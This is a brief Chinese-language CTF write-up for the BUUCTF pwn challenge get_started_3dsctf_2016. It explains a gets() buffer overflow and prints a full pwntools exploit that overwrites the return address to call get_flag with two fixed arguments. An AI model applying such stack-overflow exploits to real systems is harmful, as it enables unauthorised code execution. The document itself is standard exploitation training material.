BUUCTF-PWN-get_started_3dsctf_2016

checksec

image-20211114191954761

IDA

image-20211114192022444

gets函数可以溢出

image-20211114192720257

image-20211114192743481

需要覆盖的长度为0x38

又发现函数get_flag

image-20211114192427752

但是有if语句,得想办法绕过,那么就利用带参的地址

get_flag_addr

image-20211114193325762

a1和a2

image-20211114194510253

再找到exit函数,后面要用到

image-20211114193000791

EXP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *

p = remote('node4.buuoj.cn', 27976)

get_flag_addr = 0x080489a0
exit_addr = 0x0804E6A0
a1 = 0x308CD64F
a2 = 0x195719D1

payload = b'a' * 0x38 + p32(get_flag_addr) + p32(exit_addr) + p32(a1) + p32(a2)

p.sendline(payload)
p.interactive()

结果

image-20211114195054415